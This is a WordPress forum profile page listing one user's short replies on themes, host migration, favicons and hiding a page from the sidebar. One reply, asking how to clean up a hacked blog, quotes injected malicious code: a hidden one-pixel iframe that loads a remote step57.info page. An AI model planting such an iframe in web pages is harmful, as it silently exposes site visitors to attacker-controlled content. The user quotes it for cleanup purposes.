erusch
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Too few commnents displaying on one page. Rest are fine.Comments to a page.
Forum: Fixing WordPress
In reply to: Photo upload with a comment?I would also love to find a solution for this? Have you found anything yet?
Forum: Plugins
In reply to: Subscribe to comments vs W¨2.6I, too, would like to know the answer.
Forum: Installing WordPress
In reply to: Screwy links with new theme installGood idea, the problem was in the .htaccess file. It’s fixed now. Thanks very much.
You’re right about the new install being a test until it’s suitably tweaked. I had no idea there existed a theme switcher plugin. That’s awesome, I’ll definitely go that route. Do you happen to know if one is better than another, or just get any and use it? Thanks for the heads up on that one too.
Forum: Installing WordPress
In reply to: Screwy links with new theme installNo. I created a new mysql db with a new db name and user name (same password) in the wp-config.php file which is in the thesis directory.
Forum: Fixing WordPress
In reply to: Changed Hosts – Lost Pages and PostsI did both kinds of backups. I did the backup thing within WP where I have the DB emailed to me. I unzipped it to my desktop and couldn’t make sense of it. From what you say, it sounds like I need to find the Codex instructions.
Thanks.
Forum: Fixing WordPress
In reply to: Flash Code in Text Widget ProblemProblem solved:
Made the paths absolute and that worked.
Forum: Installing WordPress
In reply to: Changing Hosts – Will Pay $ For AssistanceI’ve read that and this: https://www.tamba2.org.uk/wordpress/move2/
and still need help.Contact: [email protected]
Forum: Fixing WordPress
In reply to: Where to insert new faviconDoh!
Thanks. That was it.
Eric
Forum: Fixing WordPress
In reply to: How to create space around image?Awesome, thanks guys.
Eric
Forum: Fixing WordPress
In reply to: Site hacked by step57 again!I’m a little late to this party, but just found a couple blogs hit by step57. I’m a tech dunce for the most part. Is there a fast way to scan all the files in the blog to see where to remove the offending code:
<iframe width=”1″ height=”1″ src=”https://step57.info/traff/index2.php” style=”border: 0;”></iframe>
Regards,
eric
Forum: Fixing WordPress
In reply to: How to hide Weblog title and Tagline?Thanks Denis,
I moved the .jpg into the skins directory instead of the headers directory where I had it and it worked as desired.
Eric
Forum: Fixing WordPress
In reply to: Want to keep a new page title off sidebarNope. Thanks for trying though.
Forum: Fixing WordPress
In reply to: Want to keep a new page title off sidebarYour instruction could not be more clear.
The page ID is 37. I have replaced:
<?php wp_list_pages(‘sort_column=menu_order&title_li=’); ?>
with:
<?php wp_list_pages(‘exclude=37&sort_column=menu_order&title_li=’); ?>
and clicked “update file” and refreshed. Page title still showing.
Strange isn’t it?
Forum: Fixing WordPress
In reply to: Want to keep a new page title off sidebarWell, I suppose most would have it sorted by now. However…
I think I’ve located the area to edit. This is how it looks now (before any attempt to modify)…
-
<div class=”widget”>
<h2><?php echo __(‘Pages’); ?></h2>
-
<?php wp_list_pages(‘sort_column=menu_order&title_li=’); ?>
</div>
I’ve made a number of attempts. Can you show me how it should look within this paste?
-
<div class=”widget”>